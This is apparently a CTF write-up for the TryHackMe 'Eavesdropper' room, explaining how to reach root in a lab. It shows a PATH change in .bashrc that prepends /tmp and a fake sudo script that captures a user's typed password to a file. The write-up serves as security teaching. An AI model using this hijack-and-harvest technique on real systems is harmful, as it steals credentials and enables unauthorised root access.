TryHackMe: Eavesdropper write-up
In this article, we will explore the solution to the “Eavesdropper” challenge, which involves monitoring Linux processes with limited privileges and exploiting the $PATH variable to gain root access on the target system.
Link: https://tryhackme.com/room/eavesdropper
Difficulty: Medium
Authors: tryhackme
, JohnHammond
, cmnatic
, timtaylor
We begin the challenge with an SSH private key and a username (frank), which grant us access to the target system. Our objective is to escalate privileges and ultimately attain root access.
I initiated the challenge by conducting an nmap scan, but the results only revealed the SSH service.
Proceeding to connect to the machine using the provided credentials, I explored the system but found nothing of particular interest. At this point, I decided to utilize pspy (GitHub). This program enables us to view all active processes on the system without requiring root permissions. I set up a Python HTTP server, transferred the tool to the target machine, and executed it. Upon doing so, I observed something intriguing:
It appears that another user periodically logs into the system as frank and employs sudo to access the /etc/shadow file approximately every 30 seconds.
The intriguing aspect of this situation is that this other user shares the bash environment with us, and we have full control over various aspects of this environment. One critical element we can manipulate is the $PATH variable, which determines the directories in which the shell searches for executable files. By altering the .bashrc file, which is executed each time a new shell is opened, we can effectively hijack the commands used by the other user.
The .bashrc file is an important configuration file for the Bash shell, which is the default command-line interface on many Linux and UNIX-based systems. This file is located in each user’s home directory and is executed each time a new terminal session or shell is opened. The .bashrc file allows users to customize their shell environment by defining aliases, setting environment variables, adjusting the command prompt, and more.
In this specific case, our goal is to intercept the sudo command. By modifying the $PATH variable in .bashrc, we can direct the system to execute a custom sudo script that we create, instead of the original sudo command. This allows us to exploit the other user’s actions and ultimately escalate our privileges on the target machine.
I went ahead and tweaked the /home/frank/.bashrc file. Notice “/tmp:” added to the start of the path string, like this:
# ~/.bashrc: executed by bash(1) for non-login shells. # see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) # for examples PATH="/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin" ...
With our changes in place, the next time the ‘frank’ user attempts to execute a command, the system will first search the /tmp directory. If a matching command is found there, the system will execute it, bypassing any subsequent directories in the $PATH.
At this point I proceeded to create a fake sudo script in the /tmp directory containing the following content:
#!/bin/bash read -sp "[sudo] password for $USER: " passvar echo $passvar > /tmp/frank_pwd.txt echo
The purpose of this script is to imitate a genuine sudo prompt, request user input, and then store the input in a file named /tmp/frank_pwd.txt. After creating the script, I granted it execution permissions using the command chmod +x /tmp/sudo
. To verify if everything is set up correctly, we can either load our modified bash profile by running source ~/.bashrc
or log out and log back in. Then, we can test the functionality by executing a sudo command, such as sudo somecommand
and observe the content of the /tmp/frank_pwd.txt file.
Now, all that’s left to do is wait for a few seconds. As anticipated a frank_pwd.txt file materializes in the /tmp directory, revealing the password for the ‘frank’ user:
Having successfully obtained the password, we now have complete access to sudo and, consequently, root privileges. The final steps involve restoring the $PATH variable to its original state and reloading the bash profile. Alternatively, we can rename our counterfeit sudo script to something else or invoke the genuine sudo command using its full path,/usr/bin/sudo
. With these actions complete, we can acquire the flag:
$ sudo cat /root/flag.txt [sudo] password for frank: flag{REDACTED}
Recent comments